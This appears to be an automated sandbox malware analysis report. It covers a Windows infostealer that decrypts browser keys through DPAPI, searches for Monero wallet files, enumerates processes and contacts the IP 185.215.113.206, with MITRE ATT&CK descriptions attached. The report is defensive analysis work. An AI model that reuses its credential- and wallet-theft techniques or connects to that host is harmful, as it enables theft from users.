Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 42e8e1a0b55d4f630b38e549c99e125a9676850b3e79fcb7bea8d0c1c2044c72
Instruction ID: 7f72615a62d7ef8028bf4a9cb9933b0ecb84ca1756abe4a6ac681bbbe276cb66
Opcode Fuzzy Hash: 42e8e1a0b55d4f630b38e549c99e125a9676850b3e79fcb7bea8d0c1c2044c72
Instruction Fuzzy Hash: 4D511B729502089ACB48FBE0DDA6DFF733AAF54340F40856CE516671D1EF346A48CB66

Function 006037B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 85104bfcc91ab60a338437ba2c59b588689b93c35b2e5d1a3970de3d0579bd5f
Instruction ID: da6c73024d37001f5d52877e3c5a1f27f68d2087eade69ce93a49ee10211ace3
Opcode Fuzzy Hash: 85104bfcc91ab60a338437ba2c59b588689b93c35b2e5d1a3970de3d0579bd5f
Instruction Fuzzy Hash: 96412971E502099BDB08EFE4D956AEFB77AAF44304F048018F416762D0EBB0AA45CFA5

Function 005FA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 005FA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005FA13C
Part of subcall function 005FA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005FA161
Part of subcall function 005FA110: LocalAlloc.KERNEL32(00000040,?), ref: 005FA181
Part of subcall function 005FA110: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005FA1AA
Part of subcall function 005FA110: LocalFree.KERNEL32(005F148F), ref: 005FA1E0
Part of subcall function 005FA110: CloseHandle.KERNEL32(000000FF), ref: 005FA1EA

Part of subcall function 00608FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608FE2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005FA489

Part of subcall function 005FA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O_,00000000,00000000), ref: 005FA23F
Part of subcall function 005FA210: LocalAlloc.KERNEL32(00000040,?,?,?,005F4F3E,00000000,?), ref: 005FA251
Part of subcall function 005FA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O_,00000000,00000000), ref: 005FA27A
Part of subcall function 005FA210: LocalFree.KERNEL32(?,?,?,?,005F4F3E,00000000,?), ref: 005FA28F

Part of subcall function 005FA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005FA2D4
Part of subcall function 005FA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 005FA2F3
Part of subcall function 005FA2B0: LocalFree.KERNEL32(?), ref: 005FA323

Strings

"encrypted_key":", xrefs: 005FA480
, xrefs: 005FA511
DPAPI, xrefs: 005FA4D9

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 00bc1ea292c27a49012dec3c6ec29b766f0fe35910cf0fe69622633d3ab93c55
Instruction ID: fc9e0a43353d1ca4531c12dd5330db62f6f2b25c8bfeab7890c0ed232518d9d5
Opcode Fuzzy Hash: 00bc1ea292c27a49012dec3c6ec29b766f0fe35910cf0fe69622633d3ab93c55
Instruction Fuzzy Hash: 253143B6D4020D9BCF04DBE4ED45AFFB7B9BF98300F444518EA05A7281E7359A44CB62

Function 00608810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006105BF), ref: 0060885A
Process32First.KERNEL32(?,00000128), ref: 0060886E
Process32Next.KERNEL32(?,00000128), ref: 00608883

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

CloseHandle.KERNEL32(?), ref: 006088F1

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 6f815cf95b98a8dfb7b25b42d510fd9a924a4a5bd61a44e9a4fc66b4cdf91be2
Instruction ID: f4ade4cd5ffafad43aa1423b0e05537917afabbab05dea076894dc4bf27b7bfb
Opcode Fuzzy Hash: 6f815cf95b98a8dfb7b25b42d510fd9a924a4a5bd61a44e9a4fc66b4cdf91be2
Instruction Fuzzy Hash: 61315C71941218ABCB68EB94CC51FEFB37AFB04740F504199F10AA21E0DB306A44CFA5

Function 0066FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0066FE13
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0066FE2C

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
Instruction ID: a47479f7f81e2a71ec6942b3c9bbd7f9e99ea7ef287eafcc4bc843fd6cd5dbaf
Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
Instruction Fuzzy Hash: 3001B136109721FEF67427B86CC99A62A97EB027B5730833EF11A842F2EF524C419144

Function 0060CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0060CA7E

Part of subcall function 0060C2A0: __amsg_exit.LIBCMT ref: 0060C2B0

__getptd.LIBCMT ref: 0060CA95
__amsg_exit.LIBCMT ref: 0060CAA3
__updatetlocinfoEx_nolock.LIBCMT ref: 0060CAC7

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: f88317b2ce6a0d8409a9696a514599a79c57a3e6ed7c70abc82cf9bb636f1c65
Instruction ID: f46bad3ad15237270d58f3354cc7e718a408548f29b8339c41aa34f92dcc9b72
Opcode Fuzzy Hash: f88317b2ce6a0d8409a9696a514599a79c57a3e6ed7c70abc82cf9bb636f1c65
Instruction Fuzzy Hash: 43F09631AC42189BD7ADFBA8580379F33A3AF40730F15924EF405962D3DB2459408799

Function 006704D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 006705DE

Strings

RCC, xrefs: 00670512
MOC, xrefs: 0067050A

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
Instruction ID: d35dccdaaa0ae7b09e75582777def5251d856109a3fc2c9b6f09e1728fe4a7dd
Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
Instruction Fuzzy Hash: F3414971900209EFEF15DF98DD81AEEBBB6BF48304F188199F908A6211D335A950DF64

Function 006736CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

T8g, xrefs: 0067371C

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: T8g
API String ID: 0-1354569598
Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
Instruction ID: 9187230119652d177af7e45bde6e771dba082581e39e24b6ca1c6d58e1bd2398
Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
Instruction Fuzzy Hash: 4C216FF1600226BF9B64AF618C818AA77ABAF40364714C51DF92D97351E731EE40A7A8

Function 00605190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00608F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608F9B

lstrcat.KERNEL32(?,00000000), ref: 006051CA
lstrcat.KERNEL32(?,00611058), ref: 006051E7
lstrcat.KERNEL32(?,00F48A88), ref: 006051FB
lstrcat.KERNEL32(?,0061105C), ref: 0060520D

Part of subcall function 00604B60: wsprintfA.USER32 ref: 00604B7C
Part of subcall function 00604B60: FindFirstFileA.KERNEL32(?,?), ref: 00604B93

Part of subcall function 00604B60: StrCmpCA.SHLWAPI(?,00610FC4), ref: 00604BC1
Part of subcall function 00604B60: StrCmpCA.SHLWAPI(?,00610FC8), ref: 00604BD7
Part of subcall function 00604B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00604DCD
Part of subcall function 00604B60: FindClose.KERNEL32(000000FF), ref: 00604DE2

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 68b9168dfa360652f4f2f1c08dbbc54b416d8db982bb25c1f0fa7691dd660982
Instruction ID: 96ce9650a54b4eb127f0cac9dfe6a334aaf3c307cf6c901b923477329701a9a4
Opcode Fuzzy Hash: 68b9168dfa360652f4f2f1c08dbbc54b416d8db982bb25c1f0fa7691dd660982
Instruction Fuzzy Hash: 3F21DDB6940208ABDB54F7B0EC46EEE333EBB94300F004558B656571D1EE749ACC8F95

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00609030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00609030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_005FA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FA2B0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_005FA2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_005F72A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_005FC920

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49752
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49941

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

